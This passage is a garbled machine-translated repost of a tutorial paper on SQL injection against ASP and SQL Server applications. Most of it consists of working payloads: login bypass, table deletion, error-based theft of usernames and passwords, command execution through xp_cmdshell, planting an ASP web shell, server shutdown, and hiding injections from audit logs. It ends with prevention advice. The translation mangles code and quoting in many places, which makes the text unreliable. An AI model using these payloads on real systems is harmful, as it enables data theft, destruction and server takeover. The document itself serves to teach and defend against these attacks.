ACCESS GRANTED
Welcome, "UserName"); response.write (" body> html>"); response.end}
}
Function main () {// set up connection
Var Username
VAR CN = Server.createObject ("AdoDb.Connection");
Cn.connectionTIMEOUT = 20;
CN.Open ("LocalServer", "SA", "password");
Username = new string (Request.form ("UserName");
IF (username.length> 0) {
Login (CN);
}
Cn.close ();
}
MAIN ();
%>
The part of the problem is part of Process_lgin.asp, producing a query statement:
Var SQL = "SELECT * from users where username = '" username "' and password = '" password "" "
If the user entered information is as follows:
Username: '; Drop Table Users-
PASSWORD:
The database in the database will be deleted and reject any user to enter the application. '-' symbols in Transact-SQL indicate ignoring '-' future statements, ';' symbol represents the end of a query and the beginning of another query. '-' is a must be in the username field, which is to terminate this special query and do not return an error.
Attackers can only provide the user name they know, you can log in with any user, use the following input:
Username: admin'-
Attackers can use the first user in the UserS table, enter the following:
Username: 'OR 1 = 1-
More specifically, an attacker can log in with a completely fiction, enter the following:
UserName: 'Union Select 1,' fictional_user ',' some_password ', 1- This result is why the application believes that the attacker specifies part of the return result from the database.
Get information through error messages
This is almost David Litchfield first discovered and tested by the author infiltrated; later David wrote a document, and later the author referred to this document. These explanations discussed the 'error message' potential mechanism to enable the reader to fully understand it, potentially triggering their ability.
In order to operate data in the database, the attacker must determine some databases and some tables of structures. For example, we can create a USER table using the following statement:
Create Talbe Users
ID INT,
Username varchar (255),
Password varchar (255),
PRIVS INT
)
Then insert the following user into the UserS table:
INSERT INTO USERS VALUES (0, 'Admin', 'R00TR0X!', 0xfff)
INSERT INTO USERS VALUES (0, 'Guest', 'Guest', 0x0000)
INSERT INTO USERS VALUES (0, 'Chris', 'Password', 0x00FF)
INSERT INTO USERS VALUES (0, 'Fred', 'Sesame', 0x00FF)
If our attacker wants to insert a self. He can't succeed if you don't know the USERS table structure. Even if he is more fortunate, it is not clear to the PRIVS field. An attacker may insert a '1', which gives him a low authority user.
Fortunately, if an error message is returned from the application (default as an ASP behavior), the attacker can determine the structure of the entire database and can connect to the permissions of SQLServer in the program.
(Below below with a simple database and ASP script, how do they work?
First, the attacker wants to get the name and field of the design of the user, to do this, the attacker needs to use the SELECT syntax Having clause:
Username: 'Having 1 = 1-
This will appear as follows:
Microsoft Ole DB Provider for ODBC Drivers Error '80040e14'
.
/Process_login.asp, line 35
So now the attacker knows the name of the table and the name of the first location. They can still put the field to the group by clause, I can only find a field name, as follows:
Username: 'group by users.id Having 1 = 1-
The error that appears is as follows:
Microsoft Ole DB Provider for ODBC Drivers Error '80040e14'
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause./process_login.asp, line 35
The final attacker gets the usrname field:
'Group by users.id, users.username, users.password, users.privs haVing 1 = 1-
This sentence does not generate an error, equivalent to:
Select * from users where username = ''
Therefore, an attacker now knows that the query involves the UserS table, sequentially uses column 'ID, username, password, privs'.
It is very useful to determine the type of each column. This can be implemented by using type conversion, for example:
Username: 'Union Select SUM (UserName) from users-
This uses SQLServer to apply the SUM clause before it is determined whether the fields of the two result sets are equal. Try to calculate SUM to get the following message:
Microsoft OLE DB Provider for ODBC Drivers Error '80040E07'
[Microsoft] [ODBC SQL Server Driver] [SQL Server] The Sum OR AVERAGE AGGREGATE OPERATION CANNOT TAKE A VARCHAR DATA TYPE AS AN Argument.
/Process_login.asp, line 35
This tells the type of our 'username' field is Varchar. If it is another case, we try to calculate SUM () is a digital type, and we get the error message tells us that the number of fields of the two collections is not equal.
Username: 'Union Select Sum (ID) from users-
Microsoft Ole DB Provider for ODBC Drivers Error '80040e14'
.
/Process_login.asp, line 35
We can use this technology to approximate the type of any field in any of the database in the database.
Such an attacker can write a good INSERT query, for example:
Username: '; Insert Into Users Values (666,' Attacker ',' Foobar ',' 0xfff) -
The potential impact of this technology is not just these. An attacker can use these error messages to display environmental information or databases. You can get a standard error message by running a string of a list of formats:
Select * from master ..sysmessages
Explain that these will implement interesting messages.
A particularly useful message is related to type transformation. If you try to convert a string into an integer number, all contents of the string will return to the error message. For example, in our simple landing page, you will display the version of SQLServer and the running operating system information after UserName: username: 'union select @@ version, 1, 1, 1-
Microsoft OLE DB Provider for ODBC Drivers Error '80040E07'
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Enterprise Edition On Windows NT 5.0 (Build 2195: Service Pack 2) 'To a column of data type int.
/Process_login.asp, line 35
This is trying to convert the built-in '@@ version' constant into a integer number because the first column in the UserS table is integer.
This technique can be used to read any of the values of any table in the database. Since the attacker is more interested in the username and user password, they prefer to read the username from the UserS table, for example:
Username: 'Union Select Min (username), 1, 1 from users where username>' A'-
This sentence selects the minimum value of the username in the usern table, and try to convert it into a integer number:
Microsoft OLE DB Provider for ODBC Drivers Error '80040E07'
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The VARCHAR VALUE 'Admin' to a Column of Data Type Int.
/Process_login.asp, line 35
Therefore, an attacker already knows that user admin is exist. This way he can repeat the next user by using the WHERE clause and the user name.
Username: 'Union Select Min (username), 1, 1, 1 from username>' admin'-
Microsoft OLE DB Provider for ODBC Drivers Error '80040E07'
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The VARCHAR VALUE 'Chris' To a Column of Data Type Int.
/Process_login.asp, line 35
Once the attacker determines the username, he can start collecting passwords:
Username: 'Union Select Password, 1, 1, 1 from users where username =' admin'-
Microsoft OLE DB Provider for ODBC Drivers Error '80040E07' [Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The VARCHAR VALUE 'R00TR0X!' TO A Column of Data Type Int.
/Process_login.asp, line 35
A more advanced technology is to connect all usernames and passwords to a separate string and try to convert it into integer numbers. This example stated that the Transavt-SQL syntax can connect them without changing the same line. The following script will connect the value:
Begin declare @ret varchar (8000)
Set @ Ret = ':'
SELECT @ RET = @ RET '' UserName '/' Password from Users Where
Username> @ret
SELECT @ret As Ret Into Foo
end
Attackers use this as a username (all in one line)
Username: ''; begin declare @ret var line (8000) set @ RET = '': '' SELECT @ Ret = @ RET '' '' Username '' / ' password from users where username> @ret select @ RET AS RET INTO foo end-
This creates a FOO table with only one separate column '' RET '', which stores the string of the username and password we get. Under normal circumstances, a low authority can create a table in the same database or create a temporary database.
Then the attacker can get the string we have to get:
Username: '' Union Select Ret, 1,1,1 from foo-
Microsoft Ole DB Provider for ODBC Drivers Error '' 80040E07 ''
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The VARCHAR VALUE '': Admin / R00TR0X! Guest / Guest Chris / Password Fred / SESAME '' '' TO A Column of Data Type Int.
/Process_login.asp, line 35
Then discard (delete) table, clear footprints:
Username: ''; Drop Table Foo-
This example is merely a surface of this technology. It is not necessary to say that if an attacker can get enough mistakes from the database, their work will become unlimited.
Get higher permissions
Once the attacker controls the database, they want to use that permissions to get higher control over the network. This can be achieved by many ways:
1. On the Database Server, use the XP_cmdshell extension stored procedure execution command with SQL Server permissions.
2. Use the XP_REGREAD extended stored procedure to read the key value of the registry, of course, including the SAM key (provided SQL Server is run by system authority) 3. Use other stored procedures to change the server
4. Execute the query on the connected server
5. Create a customer extension stored procedure to perform overflow code in the SQLServer process
6. Use the '' Bulk INSERT '' syntax to read any files on the server
7. Use the BCP to create files in any text format on the server
8. Use sp_oacreate, sp_oamethod, and sp_oagetproperty system stored procedures to create an ActiveX application, making it what you can do any ASP script.
These only list a small amount of very ordinary possible attack methods, and attackers are likely to use other methods. We introduce the collection of attacks on the obvious attack method of the SQL server, in order to explain which aspect may be, and the permissions are permissions to inject SQL .. We will process the various methods mentioned above:
[xp_cmdshell]
Many stored procedures are created in SQLServer, perform a wide variety of features, such as sending emails and interact with registry.
XP_cmdshell is a built-in stored procedure that allows an arbitrary command line command. E.g:
EXEC MASTER..DP_CMDSHELL '' DIR ''
A list of directories in the current working directory of the SQL Server process will be obtained.
EXEC MASTER.. 'Net User' '
A list of all users on the server will be provided. When SQL Server is running in a system account or domain account, an attacker can make a more serious harm.
[XP_REGREAD]
Another useful built-in stored procedure is a function collection of XP_REGXXXX classes.
XP_REGADDMULTINTISTRING
XP_RegdeleteKey
XP_Regdeletevalue
XP_RegenumKeys
XP_RegenumValues
XP_REGREAD
XP_REGREMOVEMULTINTRING
XP_Regwrite
The method of use of these functions is as follows:
EXEC XP_REGREAD HKEY_LOCAL_MACHINE, '' SYSTEM / CURRENTCONTROLSET / SERVICES / LANMANSERVER / Parameters', 'NullSsShares'
This will determine what kind of session connection is available on the server.
EXEC XP_REGENUMVALUES HKEY_LOCAL_MACHINE, '' SYSTEM / CURRENTCONTROLSET / Services / SNMP / Parameters / ValidCommunities ''
This will display all SNMP group configurations on the server. In the case where the SNMP group is rarely changed and shared between many hosts, this information, the attacker may reconfigure the network device in the same network.
This is easy to imagine an attacker to read SAM using these functions, modify the configuration of the system service, start it when the machine is restarted, or executes an arbitrary command when you log in next time.
[Other stored procedures]
The XP_ServiceControl process allows users to start, stop, suspend, and continue service:
Exec master..xp_serviceControl '' Start '', '' Schedule ''
Exec master..xp_serviceControl '' Start ',' Server ''
The following table lists a small number of other useful stored procedures:
XP_availableMedia Display Machine Drive XP_Dirtree allows a directory tree
XP_enumdsn lists ODBC data sources on the server
XP_LoginConfig Reveals Information About The Security Mode of The Server
XP_makecab allows users to create a compressed file on the server
XP_NTSEC_ENUMDOMAINS lists the domain that the server can enter
XP_TERMINATE_PROCESS Provides the process ID of the process to terminate this process
[Linked Servers]
SQL Server provides a mechanism that allows the server to connect, that is, allows queries on a database server to operate data on another server. This link is stored in the master.sysservers table. If a connection server has been set to use the '' sp_addlinkedsrvlogin '' process, the currently trusted connection can be accessed to the server without logging in. The '' OpenQuery '' function allows query out of the server to be executed.
[Custom Extended Stored Procedures]
Extended stored procedure application interfaces are quite simple, create a malicious code-carrying stored procedure dynamic connection library is a fairly simple task. There are several ways to use the command line to upload dynamic connection libraries to the SQL server, and other communication mechanisms including multiple automatic communication, such as HTTP download and FTP scripts.
Once the dynamic connection library file runs on the machine, the SQL server can be accessed - this does not need it to be a SQL server - an attacker can add an extended stored procedure using the following command (in this case, our malicious stored procedure It is a small Trojan that outputs a system file of the server):
Sp_addextendedProc '' XP_Webserver ',' 'C: /Temp/xp_foo.dll' '
In normal way, this extended stored procedure can be run:
EXEC XP_WEBSERVER
Once this program is run, you can use the following method to remove it:
XP_dropextendedProc '' XP_WEBSERVER ''
[Import text files]
Use the '' Bulk INSERT 'syntax to insert a text file into a temporary table. Simply create this table:
Create Table Foo (Line Varchar (8000))
Then execute Bulk INSERT operations into the table in the table, such as:
Bulk INSERT FOO from '' C: /inetpub/wwroot/process_login.asp ''
The above-described error message technology can be used, or using the 'union' ', the data in the text file is combined with the data returned by the application, and the data is retrieved. This is very useful for the script source code or ASP script code stored on the database server or the ASP script code.
[Establish a text file using BCP]
The relative technology using '' Bulk INSERT '' can easily establish any text file. Unfortunately, this requires command line tools. '' bcp '', ie '' bulk copy program ''
Since BCP can access the database from the SQL service process, it needs to be logged in. This means is not very difficult, and since the attacker can build, or use the overall security mechanism (if the server is configured to use it).
The command line format is as follows:
BCP "Select * from text..foo" queryout c: /inetpub/wwroot/runcommand.asp -c -slocalhost -usa -pfoobar ''s'' 'parameter is the server that executes queries,' U '' parameters are user names , '' P '' parameter is a password, here 'foobar' '
[ActiveX Automation Scripts in SQL Server]
Several built-in storage procedures for creating ActiveX automatic execution scripts are available in SQL Server. These scripts and scripts running under the Windows script interpreter, or the ASP script - they use VBScript or JavaScript, and they create automatic execution objects and interact with them. An automatic execution script uses this method to write anything that can be done in the ASP script in Transact-SQL, or anything you can do in the WSH script. In order to clarify this shoe, there are several examples here:
(1) This example creates an instance of a notepad using the '' WScript.Shell '' object:
WScript.Shell EXAMPLE
Declare @o int
Exec sp_oacreate '' wscript.shell '', @ o Out
EXEC SP_OAMETHOD @o, '' Run '', NULL, 'NOTEPAD.EXE' '
We can execute it by specifying it behind the user name:
Username: ''; declare @o int exec sp_oacreate '' 'wscript.shell', @ o out exec sp_oamethod @o, '' 'Run' ', NULL,' 'NOTEPAD.EXE' '-
(2) This example reads a known text file using the '' scripting.filesystemObject '' object:
- Scripting.FileSystemObject Example - Read a known file
Declare @o int, @f int, @T, @ret int
Declare @line varchar (8000)
Exec sp_oacreate '' scripting.filesystemObject ', @o out
EXEC SP_OAMETHOD @o, '' OpenTextFile ', @f out,' 'c: /boot.ini' ', 1
EXEC @ RET = sp_oamethod @f, '' readline '', @ line out
While (@ Ret = 0)
Begin
Print @line
EXEC @ RET = sp_oamethod @f, '' readline '', @ line out
end
(3) This example creates a command that can perform by submitted:
- Scripting.FileSystemObject Example - Create a '' Run this ''. ASP FileDeclare @o int, @ f int, @ T INT, @ Ret Int
Exec sp_oacreate '' scripting.filesystemObject '', @ o Out
EXEC SP_OAMETHOD @o, '' cretetextfile ', @ f out,' 'c: /inetpub/wwwroot/foo.asp', 1
Exec @ RET = SP_OAMETHOD @f, '' WriteLine ', NULL,' '<% set o = server.createObject ("wscript.shell"): o.run (Request.QueryString ("cmd"))%>' '
It is to be pointed out that if the running environment is on the WIN NT4 IIS4 platform, the command running through this program is run by system authority. In IIS5, it runs with a relatively low permission IWAM_XXXACCOUNT.
(4) These examples describe the application of this technology; it can use '' speech.voicetext '' objects to cause SQL Server vocal:
Declare @o int, @ RET INT
EXEC SP_OACREATE '' 'SPEECH.VOICETEXT' ', @ o Out
EXEC SP_OAMETHOD @o, '' register '', null, 'foo' ',' 'Bar' '
EXEC SP_OASETPROPERTY @o, '' speted '', 150
EXEC SP_OAMETHOD @o, '' speak '', null, '' All Your Sequel Servers Are Belong To, US '', 528
WAITFOR DELAY '' '00: 00: 05' '
In the example we assume, we can perform it by specifying it behind the user name (note that this example is not only injecting a script, while logging in to the application with admin privileges):
Username: admin ''; declare @o int, @ Ret int exec sp_oacreate '' speech.voicetext ', @ o out exec sp_oamethod @o,' 'register' ', null,' foo '', '' bar ' 'exec sp_oasetproperty @o,' 'speed' ', 150 Exec sp_oamethod @o,' 'speak', null, '' all Your Sequel Servers Are Belong To US '', 528 WAITFOR DELAY '00: 00: 05' '
[Stored procedure]
Legend has it impossible if an ASP application uses a stored procedure in the database, then SQL injection is impossible. This sentence is only half of it, it depends on how to call this stored procedure in the ASP script. Essentially, if an parameter query is executed, and the parameters provided by the user are put into the query by security check, then SQL injection is obviously impossible. But if an attacker strives to affect the non-data part of the query statement, they may be able to control the database.
A better conventional standard is:
• If an ASP script can generate a submitted SQL query string, even if it uses the stored procedure, it is also possible to cause weakness of SQL injection.
• If an ASP script uses a process object restricted parameter to allocate (such as the Command object for the ADO for parameters), then through this object, it is generally secure.
Obviously, since the new attack technology is always found, a good convention is still verifying all the inputs.
In order to clarify the query injection of the stored procedure, the following statement is performed:
SP_Who '' 1 '' Select * from sysobjects
oral
sp_who '' 1 ''; Select * from sysobjects
Any method, after the stored procedure, the additional query will still be executed.
[Advanced SQL Injection]
Typically, a web application will filter a single quotation number (or other symbol), or limit the length of the data submitted by the user.
In this section, we discuss some techniques that can help attackers to make it clearly to prevent SQL injection, avoiding recorded.
[No single quotes "string]
Sometimes developers protect the application by filtering all single quotes, they might use the Replace function in VBScript:
Function Escape (Input)
INPUT = Replace (Input, "''", "'' '")
Escape = INPUT
END FUNCTION
It is undeniable that this prevents the attacks of all our examples, and then remove ''; '' symbols can also help it. But in a large application, it seems that the individual values expect users to enter numbers. These values are not limited, so the attacker provides an weak point of SQL injection.
If an attacker wants to generate a string value without using single quotes, he can use a char function, for example:
INSERT INTO USERS VALUES (666,
Char (0x63) char (0x68) char (0x72) char90x69) char (0x73), char (0x63) char (0x68) char (0x72) char90x69) char (0x73),
0xfffff)
This is a query that does not include single quotes that can be inserted into the table.
Land, if an attacker does not mind using a digital user name and password, the following statement also works:
INSERT INTO USERS VALUES (667,
123,
123,
oxfff)
SQL Server automatically converts integration into a VARCHAR type value.
[SECOND-ORDER SQL INJECTION]
Even if the application is always filtering single quotes, the attacker can still inject SQL, and the data in the database is repeatedly used by the application.
For example, an attacker may use the following information to register in an application:
Username: admin '' -
Password: Password
The application correctly filters the single quotes, returns a INSERT statement similar to this: INSERT INTO USERS VALUES (123, '' Admin '' '' - ',' 'Password' ', 0xfff)
We assume that the application allows users to modify their passwords. This ASP script first guarantees the user to set the correct old password before setting the new password. code show as below:
Username = escape (Request.form ("UserName");
Oldpassword = escape (Request.form ("Oldpassword"));
Newpassword = escape (Request.form ("NewPassword"));
Var RSO = Server.createObject ("AdoDb.Recordset");
Var SQL = "SELECT * from users where username = ''" username "'and password =' '" Oldpassword "' '"
RSO.Open (SQL, CN);
IF (rso.eof)
{
...
Set the code for the new password as follows:
SQL = "Update users set password = ''" newpassword "'where username =' '" RSO ("UserName") "'"
RSO ("UserName") is the user name returned in the login query
When UserName is admin '' -, the query statement is:
Update users set password = '' password '' where username = '' admin '' - ''
Such an attacker can set an admin's password according to its own idea by registering an admin '' - user.
This is a very serious problem, currently trying to filter data in large applications. The best solution is to refuse illegal inputs, which is better to try to modify it. This sometimes leads to a problem, and illegal characters are necessary, such as the '' symbol in the username, for example
O''Brien
From a secure point of view, the best solution is that the quotation marks are not allowed to be a simple fact. If this is unacceptable, they still have to be filtered; in this case, all data that enters the SQL query is the best way.
If an attacker does not use any app inexplicably inserted into the system, the attack is also possible. The application may have an email interface, or may store the error log in the database so that an attacker can work hard to control it. Verify all data, including the data already existing in the database is always a good method. The confirmation function will be simply called, for example:
IF (Not Isvalid ("Email", Request.QueryString ("email"))).
Response.end
Or similar methods.
[Length Restriction] In order to give attackers more difficult, sometimes the length of input data is limited. When this hinders attacks, a small SQL can cause very serious harm. E.g:
Username: ''; shutdown-
This will stop the SQL Server instance using only 12 input characters. Another example is:
Drop Table
If the limit length is after the filter string will cause another problem. Suppose the username is limited to 16 characters, the password is also limited 16 characters, then the following username and password will perform the shortdown command mentioned above:
Username: Aaaaaaaaaaaaaa '' '
Password: ''; shutdown-
The reason is that the application attempts to filter the last single quotes of the username, but the string is cut into 16 characters and delete a single quotes after filtering. Such a result is that if the password field begins with single quotation, it can contain some SQL statements. Since the query looks:
Select * from users where username = '' aaaaaaaaaaaaa '' '' and password = '' '' '; shutdown-
In fact, the username in the query has changed:
Aaaaaaaaaaaaaa '' and password = ''
So the last SQL statement will be executed.
[audit]
SQL Server contains a rich audit interface that allows various events in the database, which is included in the SP_Tracexxx class. It is especially interesting that all SQL statements can be recorded, then the T-SQL events executed on the server. If this audit is activated, all injected SQL queries we discussed will be recorded in the database, and a skilled database administrator will know what happened. Unfortunately, if an attacker adds a string below:
SP_Password
In a Transact-SQL statement, this audit mechanism record log is as follows:
- '' sp_password '' Was Found in The Text of this Event.
- The Text Has Been Replaced with this Comment for Security Reasons.
This behavior occurs in all T-SQL diary records, even if '' sp_password '' occurs in one comment. This process intends to hide the user's password through sp_password, but this is a very useful method for an attacker.
Therefore, in order to hide all injections, the attacker needs to simply add sp_password after '' - '' comment characters, for example:
UserName: admin '' - sp_password
In fact, some SQL executed will be recorded, but the query itself will disappear smoothly from the log.
[Prevent]
This part discusses some of the prevention of the description of the attack. We will discuss input confirmation and provide some simple code, and then we will engage in SQL Server lock.
[Enter verification]
Enter verification is a complex topic. More representative is that since it is too closely confirmed that the temporary temporarity temporarily caused, the input confirmation is difficult to resolve, and there are few attention to the project development to confirm. The input confirmation is not a function of inclined it to the application's function, so it is generally ignored.
Below is an outline of discussion input confirmation with simple code. This simple code cannot be used directly in the application, but it clearly clarifies different strategies. Different data confirmation methods can be classified according to:
1) Work hard to modify the data to make it correct
2) Refuse to be considered an incorrect input
3) Only receiving is considered to be correct input
The first case has some conceptual problems; first, developers don't have to know that those are wrong data, because the form of new error data is always found. Second, modifying the data will cause the length problem of the data described above. Finally, the problem of secondary use includes reuse that already exists in the system.
The second case also has problems in the first case; known error inputs with the development of attack technologies.
The third case may be the best in three, but it is difficult to implement.
From a security perspective, the second method and the third method may be the best way - only the correct input, then search for the error data known in the input.
The problem with the name of the connection symbol is a good example of the need to reflect the two methods of combining:
Quentin Bassington-Bassington
We must allow the connection symbols in the correct input, but we also realize that the character sequence '' - '' is important to SQL Server.
Another problem occurs when merging and modifying data and character sequence confirmation. For example, if we apply an error filtering to detect '' - '', 'SELECT' 'and' 'Union' 'after removing single quotes, the attacker can enter:
Uni''on sel''Ect @@ version -''-
Since single quotes are removed, the attacker can simply spread the single quotuary to avoid discovery in their own wrong string.
This has some examples of confirmation code:
Method 1 - Filter single quotes
Function Escape (Input)
INPUT = Replace (Input, "''", "'' '")
Escape = INPUT
END FUNCTION
Method 2 - Reject known error input
Function Validate_String (Input)
KNOWN_BAD = Array ("SELECT", "INSERT", "Update", "DELETE", "DROP", "-", "''")
Validate_String = True
For i = lbound (known_bad) to Ubound (known_bad)
IF (INSTR (1, Input, KNown_Bad (i), VbtextCompare) <> 0) THEN
Validate_string = false
EXIT FUNCTION
END IF
NEXT
END FUNCTION
Method 3 - only allowed correct input
Function ValidatePassword (INPUT)
Good_password_chars = "AbcdefghijklmnopqrStuvwxyzabcdefghijklmnopqrStuvwxyz0123456789"
ValidatePassword = TRUE
For i = 1 to Len (Input)
C = MID (INPUT, I, 1)
IF (INSTR (Good_Password_Chars, C) = 0) THEN
ValidatePassword = FALSE
EXIT FUNCTION
END IF
NEXT
END FUNCTION
[SQL Server Lock]
It is important to lock SQL Server if it is not safe to lock SQL Server; This is a short list of things that you need to do when you create SQL Server:
1. Determine the method of connecting the server
a. Make sure the network library you use is available, then use "NetWork Utility"
2. Determine which accounts are existing
a. Create a low permissions for the use of the application
b. Delete unnecessary accounts
c. Determine all accounts have a strong password; execute password audit
3. Determine which objects exist
a. Many extended stored processes can be safely removed. If this is done, you should remove the '' .dll 'file contained in the extended stored procedure code.
b. Remove all sample databases, such as 'Northwind' 'and' 'Pubs' Database
4. Determine which objects can be used to use?
a. The account used by the application enters the database should have the minimum permissions that guarantees the object it needs to use.
5. Determine the server's patches
a. For SQL Server has some buffer overflow and formatted string attacks, there are also some other security patches release. There should be a lot.
6. OK should be recorded by logs, what should be ended in the log.
转载请注明原文地址:https://www.9cbs.com/read-121305.html